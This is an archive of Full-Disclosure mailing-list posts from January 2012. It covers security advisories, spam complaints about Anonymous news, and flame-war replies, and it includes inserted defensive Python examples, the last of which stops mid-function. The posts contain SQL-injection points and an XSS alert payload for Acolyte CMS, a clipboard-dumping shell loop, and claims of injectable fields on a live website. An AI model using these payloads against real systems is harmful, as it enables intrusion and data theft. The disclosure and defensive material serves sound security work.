Details:
========
1.1
A SQL Injection vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows a remote attacker to execute sql commands via remote sql injection attack. The bug is located on the news_comments plugin_forum module of the content management system. Successful exploitation of the vulnerability allows remote attacker to compromise the application dbms.

Vulnerable Module(s): (v1.5.3)
[+] ?c=pluginplugin=forums
[+] ?c=news_comments

Vulnerable Module(s): (v1.6.3)
[+] ?c=news_comments
[+] ?c=forum_post

1.2
A persistent input validation vulnerability is detected on the powered by Acolyte v1.5 v6.3 CMS. The vulnerability allows a remote attacker to hijack customer sessions via application side attack. Successful exploitation with required user interaction allows an attacker to manipulate the web context requests of the vulnerable application module.

Vulnerable Module(s): (v1.6.3 v1.5.3)
[+] ?c=pluginplugin=forums

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attacker. For demonstration or reproduce ...

1.1
v1.5.3
?c=pluginplugin=forums2=topicss=[vuln]
?c=pluginplugin=forums2=posts=3t=[vuln]
?c=news_commentscid=[vuln]

v1.6.3
?c=forum_posts=3t=[vuln]
?c=forum_posts=[vuln]
?c=news_commentscid=[vuln]

1.2
?c=pluginplugin=forums2=search
scriptalert(vulnerability-lab)/script

Risk:
=====
1.1
The security risk of the sql injection vulnerabilities are estimated as high(+).

1.2
The security risk of the persistent input validation vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Laboratory Researcher - snup (snup@gmail.com)
[Full-disclosure] [SECURITY] [DSA-2393-1] bip security update
Debian Security Advisory DSA-2393-1          secur...@debian.org
http://www.debian.org/security/              dann frazier
January 25, 2012                             http://www.debian.org/security/faq

Package        : bip
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0806
Debian Bug     : 657217

Julien Tinnes reported a buffer overflow in the bip multiuser irc proxy which may allow arbitrary code execution by remote users.

The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in version 0.8.2-1squeeze4.

For the testing distribution (wheezy) and the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your bip packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] CFP: MobiPST 2012
We apologize if you received multiple copies of this CFP and we appreciate if you help to forward the CFP. The Second International Workshop on Privacy, Security and Trust in Mobile and Wireless Systems (MobiPST 2012) München, Germany, July 30 to August 2, 2012 Recently, mobile wireless devices, such as wireless sensors, smart tags, smart pads, tablets, PDAs and smart phones, have become pervasive and attracted significant interests from academia, industry, and standard organizations. With the support of latest cloud computing technology, these mobile wireless devices will play a more and more important role in computing and communication systems. When these devices become pervasive, security, privacy and trust become critical components for the acceptance of applications build based on these devices. Moreover, several favourable characteristics of mobile and wireless devices, including portability, mobility, and sensitivity, further impose the challenge of security and privacy in those systems. Despite recent advances, many research issues still remain in the design of secure, privacy-preserving, or trust architectures, protocols, algorithms, services, and applications on mobile and wireless systems. For example, when mobile devices have more storage space, high bandwidth, and super sensing capability, more sensitive information will be stored in those devices. On the other hand, operating systems running on those devices are not as powerful and reliable as those on traditional computers. Both OS layer and higher-level layer protocols are expected to enhance the security and preserve the privacy of those devices. With more mobile devices being used in social networks and traditional web-based systems, novel trust models are essential for new applications. New cryptographic algorithms, key distribution schemes and access control policies are also encouraged by considering the special characteristics of mobile and wireless devices. 
With more and more attacks reported to mobile devices in last two years, threat detection and protection tools are highly expected to improve the security. Other issues such as malware, cyber threat, attack modelling, security analysis, identity management, attack tolerance, security recovery and anonymity techniques also need to be revisited in these critical systems.

This workshop aims to bring together the technologists and researchers who share interests in the area of security, privacy and trust in mobile and wireless systems, as well as explore new venues of collaboration. The main purpose is to promote discussions of research and relevant activities in the models and designs of secure, privacy-preserving, or trust architectures, protocols, algorithms, services, and applications, as well as analysis on cyber threat in mobile and wireless systems. It also aims at increasing the synergy between academic and industry professionals working in this area. We plan to seek papers that address theoretical, experimental research, and work in-progress for security, privacy and trust related issues in the context of mobile and wireless systems that include, but are not limited to, the following:

Social Networks
Smart Grid
RFID-based Systems
Mobile Cloud
Cyber-Physical Systems
Internet of Things
Location-based Service Systems
Wireless Local Area Networks
Wireless Sensor Networks
Wireless Mesh Networks
Wireless Ad-hoc Networks
Vehicular Networks
Body-area Networks
Cellular Networks
Home Networks

Authors are invited to submit manuscripts reporting original unpublished research and recent developments in the topics related to the workshop. Submissions should include a title, abstract, keywords, author(s) and affiliation(s) with postal and e-mail address(es) of the corresponding author.
Submitted manuscripts must be formatted in standard IEEE camera-ready format (double-column, 10-pt font) and must be submitted via EDAS ( http://edas.info/ ) as PDF files (formatted for 8.5x11-inch paper). The manuscripts should be no longer than 5 pages. One additional page is permitted if the authors are willing to pay an over-length charge at the time of publication (manuscripts should not exceed 6 pages). Submitted papers cannot have been previously published in or be under consideration for publication in another journal or conference. The workshop Program Committee reserves the right to not review papers that either exceed the length specification or have been submitted or published elsewhere. Submissions must include a title, abstract, keywords, author(s) and affiliation(s) with postal and e-mail address(es). All authors of a paper must be registered in the RIGHT order via EDAS at the SUBMISSION TIME and cannot be changed after the submission due time at EDAS. The paper title and author name list/order cannot be changed during the final camera-ready submission. The final program will be generated from EDAS automatically. A paper abstract
Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress
Funny but no, this does not need a non-installed wordpress.

2012/1/25 Benji m...@b3nji.com
> Dear full-disclosure
>
> I wrote to you to tell you about serious serious vulnerability in all Windows versions. If you turn machine on before system is configured, then you be able to set user password yourself, big gaping hole I make big large botnet to fully utilise this impressive vulnerability! thegrugq said i could sell this for liike 3 ferrari's and 1 russian wife, i say nay though! Big time russian mobster offer me diamond, i say nay! I like report vuln of this size responsibility in so hope to make more money^H^H^H^H^H^H^Hsecure world.
>
> Please full-disclosure, this vuln is serious and i plead you shut down all windows now. I wrote metasploit module! It find new installs turned off machine, WOL and i go to house and enter password! FULL SYSTEM OWNED! Big botnets! Many wifes!
>
> On Wed, Jan 25, 2012 at 2:49 PM, Tim Brown t...@65535.com wrote:
> > On Wednesday 25 Jan 2012 15:22:39 Henri Salo wrote:
> > > There is A LOT of these open installation pages in the Internet. It is not uncommon to leave those open by accident. Some people also do this, because they just don't understand the risks. I am wondering if WordPress would apply patch if we create one as a collaborative effort. I would be more than happy to help creating a patch for this if this is the case.
> >
> > I may have missed something, but does simply having the file exposed make you vulnerable. From looking at it, it starts of with a bunch of file_exists(), which essentially evaluate if you've installed or not and wp_die() if you have.
> >
> > Tim
> > --
> > Tim Brown mailto:t...@65535.com
[Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
*UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not.

Sources from karmacyberintel.net, for more details: http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
[Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Anonymous deletes CBS.com, solicits opinions on who to hack next.

Sources from karmacyberintel.net, for more details: http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/
[Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
(CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/
[Full-disclosure] NX Web Companion Spoofing Arbitrary Code Execution Vulnerability
# Vuln Title: NX Web Companion Spoofing Arbitrary Code Execution
#             Vulnerability
# Date: 25.01.2012
# Author: otr
# Software Link: http://www.nomachine.com/documents/plugin/install.php
# Version: = 3.x
# Tested on: Linux, Windows, Mac OS X x86, Mac OS X PPC, Solaris
# CVE : None, yet

Summary

The No Machine NX Web Companion is a Java applet that downloads and updates the No Machine software from a server. The No Machine software is used to remotely access computers. The NX Web Companion is usually used by enterprises to easily deploy a cross-platform client for accessing remote machines.

Context

For security purposes the NX Web Companion Java applet jar file is often code signed. Signed Java applets are allowed to run arbitrary code (outside of the Java sandbox) on the client system if the user confirms that he trusts the certificate the code was signed with. If a company decides to use the NX Web Companion it is likely to not only self-sign. Therefore it would get a CA signed certificate for the Web Companion. The defaults when accepting such a signed Java applet are to run the applet in question and trust the publisher forever, meaning that any time the user browses to a page containing that applet, the applet code is executed automatically outside of the Java sandbox.

In the worst case, the NX Web Companion spoofing vulnerability allows execution of arbitrary code on the client by abusing the trust the user once placed in the signed jar file.

Details

The Java applet nxapplet.jar downloads a file called client.zip from a location that can be controlled by the attacker using a fake web site and the parameters passed to the applet (SiteUrl, RedirectUrl). The applet can be tricked into thinking that a new version is available by modifying the *ClientVersion parameters. After user confirmation, the applet then downloads a file client.zip from the location provided in SiteUrl. client.zip is an archive that contains a platform-dependent executable that is _not_ code signed and therefore may be manipulated by an attacker to run arbitrary code, abusing the trust placed in the nxapplet.jar certificate.

The client.zip file actually contains a file called client that is lzma compressed. The file client itself is a zip archive that contains the platform-dependent executable, which is called:

For Windows: nxclient.exe
For Linux: bin/nxclient
For OS X: bin/nxclient.app/Contents/MacOS/
For Solaris: bin/nxclient

Report Timeline

2011-12-12: Vendor Notification
2011-12-15: Vendor Response
2012-01-16: Vendor agrees to disclosure
2012-01-25: Public Disclosure
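The check whose absence the NX Web Companion advisory describes, as an added example (not NoMachine's code and not part of the advisory): the signed code pins the download origin and a SHA-256 digest per client version, so an archive served from an attacker-chosen SiteUrl, or offered under an unknown *ClientVersion, is rejected before anything is unpacked. The pinned host, the version string, the digest-pinning design and every function name are assumptions; the nested archive layout follows the advisory and the sample archive is constructed.

```python
import hashlib
import io
import lzma
import zipfile
from urllib.parse import urlsplit

# Assumptions for this sketch: these values ship inside the signed jar, so the
# signature the user already trusted also covers them.
PINNED_ORIGIN = ("https", "updates.example.com", 443)  # hypothetical host
MAX_UNPACKED = 64 * 1024 * 1024                         # cap per unpacked layer

# Executable path inside the inner archive, per the advisory (the OS X entry is
# listed there only as a directory, so it is left out here).
PLATFORM_EXECUTABLE = {
    "windows": "nxclient.exe",
    "linux": "bin/nxclient",
    "solaris": "bin/nxclient",
}


class UpdateRejected(Exception):
    """The update source or payload failed a check."""


def check_site_url(site_url):
    """Accept SiteUrl only when scheme, host and port equal the pinned origin."""
    try:
        parts = urlsplit(site_url)
        port = parts.port or {"https": 443, "http": 80}.get(parts.scheme)
    except ValueError as exc:
        raise UpdateRejected(f"unparseable SiteUrl: {site_url!r}") from exc
    if (parts.scheme, parts.hostname, port) != PINNED_ORIGIN:
        raise UpdateRejected(f"SiteUrl origin not allowed: {site_url!r}")


def bounded_lzma(data, limit=MAX_UNPACKED):
    """Decompress an LZMA stream, refusing output larger than `limit` bytes."""
    decompressor = lzma.LZMADecompressor()  # auto-detects .xz and legacy .lzma
    try:
        out = decompressor.decompress(data, max_length=limit + 1)
    except lzma.LZMAError as exc:
        raise UpdateRejected(f"bad LZMA stream: {exc}") from exc
    if len(out) > limit:
        raise UpdateRejected("decompressed payload exceeds size cap")
    if not decompressor.eof:
        raise UpdateRejected("truncated LZMA stream")
    return out


def read_member(archive, name):
    """Read one zip member after checking its declared uncompressed size."""
    info = archive.getinfo(name)  # KeyError if the member is missing
    if info.file_size > MAX_UNPACKED:
        raise UpdateRejected(f"{name} exceeds size cap")
    return archive.read(info)


def verify_and_extract(site_url, client_version, client_zip, pinned, platform):
    """Return the platform executable bytes, or raise UpdateRejected."""
    check_site_url(site_url)
    expected = pinned.get(client_version)
    if expected is None:
        raise UpdateRejected(f"no pinned digest for version {client_version!r}")
    # Digest first: the archive is not parsed until its bytes match the pin.
    if hashlib.sha256(client_zip).hexdigest() != expected:
        raise UpdateRejected("client.zip digest mismatch")
    try:
        with zipfile.ZipFile(io.BytesIO(client_zip)) as outer:
            inner_bytes = bounded_lzma(read_member(outer, "client"))
        with zipfile.ZipFile(io.BytesIO(inner_bytes)) as inner:
            return read_member(inner, PLATFORM_EXECUTABLE[platform])
    except (KeyError, zipfile.BadZipFile) as exc:
        raise UpdateRejected(f"malformed archive: {exc}") from exc


def is_accepted(site_url, client_version, client_zip, pinned, platform="linux"):
    """Boolean wrapper around verify_and_extract."""
    try:
        verify_and_extract(site_url, client_version, client_zip, pinned, platform)
        return True
    except UpdateRejected:
        return False


def build_sample_client_zip(executable_bytes, platform="linux"):
    """Constructed sample: zip -> LZMA-compressed 'client' -> zip -> executable."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(PLATFORM_EXECUTABLE[platform], executable_bytes)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("client", lzma.compress(inner.getvalue(), format=lzma.FORMAT_ALONE))
    return outer.getvalue()


if __name__ == "__main__":
    genuine = build_sample_client_zip(b"constructed genuine nxclient")
    swapped = build_sample_client_zip(b"constructed replaced nxclient")
    pinned = {"3.5.0": hashlib.sha256(genuine).hexdigest()}  # constructed version
    good = "https://updates.example.com/nx/"
    print("genuine archive, pinned origin:", is_accepted(good, "3.5.0", genuine, pinned))
    print("replaced archive:", is_accepted(good, "3.5.0", swapped, pinned))
    print("unknown ClientVersion:", is_accepted(good, "9.9.9", genuine, pinned))
    print("other SiteUrl:", is_accepted("http://other.example/nx/", "3.5.0", genuine, pinned))
```

A production updater would more likely verify a publisher signature over a version manifest; the pinned digest is used here only to keep the example within the standard library.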
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and *not* to ever visit that site again.

Short version: the purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt

Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us.

Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with how you've configured SSL and everything else.

If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure.

On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote:
> *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgeable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente

On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. 
The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
Douchebags are all the same everywhere, even if you aren't Andrew Wallace, this does not make you not a douchebag. Sorry. Good luck with your packets! Andrew On 1/25/2012 4:24 PM, xD 0x41 wrote: stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peressheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. 
The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Bandwidth bills.

2012/1/25 karma cyberintel karmacyberint...@gmail.com Anonymous deletes CBS.com, solicits opinions on who to hack next sources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
Anonymous is definitely not a group (as in a group that has actual members), you should know better.

2012/1/25 karma cyberintel karmacyberint...@gmail.com *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine
Those who try to manage potentially malicious servers do so over IP KVM, in which the foreign server basically gets only inbound Keyboard and Mouse and outbound uncompressed pixels.

Feature or bug, VNC or IP KVM, a VirtualBox virtualized machine with shared clipboard has the same behavior. You can choose disabled, direction and bidirectional (by default). Something to keep in mind, at least for beginners like me. Just run this in the guest and see your clipboard; sure, there are more elegant ways of doing the same (tested Linux in Linux with VirtualBox and Linux in Mac with VMware):

    while true; do
        xsel -p   # PRIMARY selection
        echo
        xsel -s   # SECONDARY selection
        echo
        xsel -b   # CLIPBOARD selection
        echo
    done

Carlos Pantelides - http://seguridad-agile.blogspot.com/
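To check on the wire whether a viewer pushes the clipboard before the user does anything, look for an RFB ClientCutText message (type 6, RFC 6143) ahead of the first key or pointer event. This is an added example, not code from the thread; it assumes an unencrypted client-to-server byte stream with the handshake already stripped, and the function names and the sample stream are constructed for illustration.

```python
"""Added example: find clipboard pushes in a VNC (RFB) client-to-server stream."""
import struct

# Total size in bytes of the fixed-length client-to-server messages
# (RFC 6143 section 7.5): SetPixelFormat, FramebufferUpdateRequest,
# KeyEvent, PointerEvent. Types 2 and 6 carry their own length field.
FIXED_SIZES = {0: 20, 3: 10, 4: 8, 5: 6}
SET_ENCODINGS, KEY_EVENT, POINTER_EVENT, CLIENT_CUT_TEXT = 2, 4, 5, 6


class TruncatedStream(ValueError):
    """The capture ends in the middle of a message."""


def need(stream, pos, size):
    # Bounds check before trusting a length field taken from the wire.
    if pos + size > len(stream):
        raise TruncatedStream(f"message at offset {pos} needs {size} bytes")


def iter_client_messages(stream):
    """Yield (offset, message_type, raw_message) for each message."""
    pos = 0
    while pos < len(stream):
        mtype = stream[pos]
        if mtype in FIXED_SIZES:
            size = FIXED_SIZES[mtype]
        elif mtype == SET_ENCODINGS:
            need(stream, pos, 4)  # type, pad, 16-bit encoding count
            (count,) = struct.unpack_from(">H", stream, pos + 2)
            size = 4 + 4 * count
        elif mtype == CLIENT_CUT_TEXT:
            need(stream, pos, 8)  # type, 3 pad bytes, 32-bit text length
            (length,) = struct.unpack_from(">I", stream, pos + 4)
            size = 8 + length
        else:
            raise ValueError(f"unknown message type {mtype} at offset {pos}")
        need(stream, pos, size)
        yield pos, mtype, stream[pos:pos + size]
        pos += size


def clipboard_before_input(stream):
    """Return (offset, text) for each ClientCutText seen before any user input."""
    found = []
    for offset, mtype, msg in iter_client_messages(stream):
        if mtype in (KEY_EVENT, POINTER_EVENT):
            break  # the user has started interacting; stop looking
        if mtype == CLIENT_CUT_TEXT:
            found.append((offset, msg[8:].decode("latin-1")))
    return found


def cut_text(text):
    """Build a ClientCutText message (used only for the constructed sample)."""
    data = text.encode("latin-1")
    return struct.pack(">B3xI", CLIENT_CUT_TEXT, len(data)) + data


# Constructed sample: what a viewer might send right after connecting.
SAMPLE_STREAM = b"".join([
    bytes(20),                                       # SetPixelFormat
    struct.pack(">BxHii", SET_ENCODINGS, 2, 0, 1),   # SetEncodings, 2 entries
    cut_text("constructed-secret"),                  # clipboard, no input yet
    struct.pack(">BBHHHH", 3, 0, 0, 0, 800, 600),    # FramebufferUpdateRequest
    struct.pack(">BBHH", POINTER_EVENT, 0, 10, 10),  # first mouse movement
    struct.pack(">BBxxI", KEY_EVENT, 1, 0x61),       # key press
    cut_text("copied during the session"),           # expected clipboard use
])

if __name__ == "__main__":
    for offset, text in clipboard_before_input(SAMPLE_STREAM):
        print(f"clipboard sent before any input, offset {offset}: {text!r}")
```

An empty result means no clipboard text left the viewer before the first key or pointer event in that capture.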
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
Reporting three day old news to Full-Disclosure. Awesome.

On Wed, Jan 25, 2012 at 1:51 AM, karma cyberintel karmacyberint...@gmail.com wrote: Anonymous deletes CBS.com, solicits opinions on who to hack next sources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
+1 On 2012-01-25 12:17 PM, adam a...@papsy.net wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. 
Not to mention, all the problems with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I am pretty sure their host is gonna be suspending them after the DDoS that just hit them. (their real host that is, not the proxy.)
Re: [Full-disclosure] Vopium VoIP app is leaking login, password, IMEI, geolocation, and all your contacts in clear text
Hi Henry, I don't see a timeline. What was the vendor's response? Jeff

On Fri, Jan 20, 2012 at 11:29 AM, Henry Paduwa henry.pad...@yahoo.fr wrote:

Hi, I discovered that Vopium (http://vopium.com/), a popular VoIP app for Android and iPhone, is simply leaking in *clear text* :
- your login
- your IMEI (unique ID of your phone)
- your password (not even hashed !)
- your geolocation
- and all your contacts !

Just use wireshark on your network and put http as filter. See capture extract below :

FIND_YOUR_USERNAME_HERE - it will be your phone number

Here the longitude, latitude, login and IMEI:

GET /ge/index.php?ll=60.2345,9.1232username=FIND_YOUR_USERNAME_HEREimei=FIND_IMEI_HERE HTTP/1.1
Host: vopium.com
User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: __vc_lng=en
[...]

Here the login and password :

POST /packagedetails.php?n=FIND_YOUR_USERNAME_HEREp=FIND_YOUR_PASSWORD_HERE HTTP/1.1
Host: vopium.com
User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0
Content-Length: 0
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
[...]

And another one :

GET /j/checkbalance.htm?username=FIND_YOUR_USERNAME_HEREpassword=FIND_YOUR_PASSWORD_HEREamountonly=y HTTP/1.1
Host: vopium.com
User-Agent: Vopium3G/3.3 CFNetwork/548.0.4 Darwin/11.0.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
[...]

And all your contacts :

POST /oauthserver/synchservice HTTP/1.1
[...]
username=FIND_YOUR_USERNAME_HEREpassword=FIND_YOUR_PASSWORD_HEREtype=setusercontacts=FIND_ALL_YOUR_CONTACTS_DATA
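The manual Wireshark check described in the report can be turned into a repeatable audit of captured plaintext requests. This is an added example, not code from the post or the vendor; the parameter names and paths come from the capture above, while the host `voip.example`, the `&` separators, the Content-Type header and all values are constructed placeholders.

```python
"""Added example: flag sensitive parameters in requests captured as plaintext HTTP."""
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Parameter names as they appear in the capture quoted in the post,
# mapped to the kind of data each one exposes.
SENSITIVE = {
    "username": "login", "n": "login",
    "password": "password", "p": "password",
    "imei": "device id",
    "ll": "geolocation",
}
FORM = "application/x-www-form-urlencoded"


def parse_request(raw):
    """Split one raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def find_leaks(raw):
    """Return one finding per sensitive parameter in the URL or form body."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    sources = [("query", url.query)]
    if headers.get("content-type", "").lower().startswith(FORM):
        sources.append(("body", body.strip()))
    findings = []
    for where, data in sources:
        for name, value in parse_qsl(data, keep_blank_values=True):
            kind = SENSITIVE.get(name.lower())
            if kind is not None:
                findings.append({
                    "host": headers.get("host", "?"),
                    "request": f"{method} {url.path}",
                    "where": where,
                    "param": name,
                    "kind": kind,
                    # Report only the length so the audit output does not
                    # become a second copy of the secret.
                    "value": f"<{len(value)} chars>",
                })
    return findings


def summarize(requests):
    """Count findings per kind across a list of raw requests."""
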